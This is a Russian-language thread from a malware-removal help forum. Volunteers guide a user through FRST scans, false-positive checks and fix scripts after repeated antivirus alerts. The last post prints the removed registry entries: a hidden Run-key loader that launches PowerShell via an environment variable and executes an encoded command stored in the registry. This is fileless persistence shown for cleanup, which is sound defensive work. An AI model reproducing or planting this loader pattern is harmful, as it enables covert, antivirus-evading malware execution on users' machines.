Решена Уже три раза предлагается лечение одной и той же угрозы.

Переводчик Google
Александр-l

Александр-l

Новый пользователь
Сообщения
28
Реакции
4
Вот такое окно появляется уже 3 раз после двух процедур лечения:

Полную проверку ПК пока не делал.
Можно ли выявить вредоносный файл, на который реагирует АВ?
 

Вложения

Что говорит по файлу VirusTotal

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Да (Yes) для соглашения с предупреждением.

Нажмите кнопку Сканировать (Scan).
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 
Просьба не делать очистку историй браузеров в скриптах!

VirusTotal

VirusTotal
www.virustotal.com www.virustotal.com
 

Вложения

  • 11.rar
    11.rar
    21.4 KB · Просмотры: 10
Возможно ложное срабатывание. Базы антивируса обновлены?

Нужно загрузить файл на сайт Kaspersky Threat Intelligence Portal, по завершению анализа отправить на повторный анализ.
1743365755798.webp


Подробнее Периодические ложные срабатывания приложений «Лаборатории Касперского». Что делать при ложных срабатываниях?

Или через службу поддержки

Technischer Support von Kaspersky für Privatanwender

Erhalten Sie alle notwendigen Informationen zu Kaspersky-Apps auf der Website des technischen Supports von Kaspersky. Hier finden Sie: Dokumentation, Anweisungen zur Problembehandlung, kostenfreie Apps sowie Kontakte des technischen Supports von Kaspersky. Darüber hinaus könne Sie hier eine...
support.kaspersky.ru support.kaspersky.ru
 
Попробую отправить запрос в техподдержку антивируса.
 
  • Like
Реакции: akok
Отправил несколько дней назад запрос и, похоже, срабатывания прекратились, правда, ответа пока не получил.
 
Отлично. В логах не вижу ничего подозрительного.

Подготовьте лог лог SecurityCheck by glax24

Чтобы автоматически удалить все файлы и папки, созданные FRST, в том числе сам инструмент, переименуйте FRST/FRST64.exe в uninstall.exe и запустите его. Процедура требует перезагрузки системы.
 
Скрипт удалит следы бывшей установки Dr.Web (очистки темпов не будет).

  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код: 
    Start::
CloseProcesses:
AV: Dr.Web Security Space (Enabled - Up to date) {250CDD7E-926B-AEFC-24F0-E203A6F6D244}
Reboot:
End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Исправить (Fix) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Обратите внимание:
Adobe Reader XI (11.0.23) - Russian v.11.0.23 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
Microsoft Edge v.134.0.3124.93 Внимание! Скачать обновления
^Проверьте обновления через меню Справка и отзывы - О программе Microsoft Edge!^

Читайте Рекомендации после удаления вредоносного ПО
 
Позавчера опять появлялось это окно с ieinstal. Пока переписываюсь с поддержкой. Запросили дампы памяти процесса.
 
Эти записи Powershell в автозагрузке вам известны?

HKU\S-1-5-21-1733455978-3607855058-934629134-1001\...\Run: [Viewines] => c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [424448 2025-03-24] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\Environment: [Vr9] powershell.exe <==== ВНИМАНИЕ
Нажмите для раскрытия...
 
Последнее редактирование:
Отключите до перезагрузки антивирус.
Выделите следующий код:

Код: 
Start::
CloseProcesses:
SystemRestore: On
CreateRestorePoint:
ExportKey: HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Software\Microsoft\Windows\CurrentVersion\Run
ExportKey: HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Environment
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\...\Run: [Viewines] => c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [424448 2025-03-24] (Microsoft Windows -> Microsoft Corporation) <==== ВНИМАНИЕ
HKU\S-1-5-21-1733455978-3607855058-934629134-1001\Environment: [Vr9] powershell.exe <==== ВНИМАНИЕ
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Ограничение <==== ВНИМАНИЕ
Reboot:
End::
Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix (Исправить) один раз (!) и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению. Вставлять код никуда не нужно - он будет выполнен из буфера обмена.
Компьютер будет перезагружен автоматически.
 
Понаблюдайте за проблемой
 
Удалось ли выявить вредоносные файлы, неопределяемые антивирусом?
 
Здесь нет файлов, здесь команда Powershell прописанная на запуск в реестре.
 
Severnyj написал(а):
Здесь нет файлов, здесь команда Powershell прописанная на запуск в реестре.
Нажмите для раскрытия...
А она какой-то конкретный код пыталась выполнить? (Думаю, отправлю эту тему с лечением в техподдержку тоже)
 
Да, конечно, отправляйте, экспорт удаленного из реестра:

Код: 
[HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Software\Microsoft\Windows\CurrentVersion\Run]
"Viewines"="%Vr9% -w 1 $elfe=(Get-ItemProperty -Path 'HKCU:\SOFTWARE\AppDataLow\').Ostalgi;%Vr9% -encodedcommand($elfe)"

[HKEY_USERS\S-1-5-21-1733455978-3607855058-934629134-1001\Environment]
"Vr9"="powershell.exe"
 
Войдите или зарегистрируйтесь для ответа.
Назад
Сверху Снизу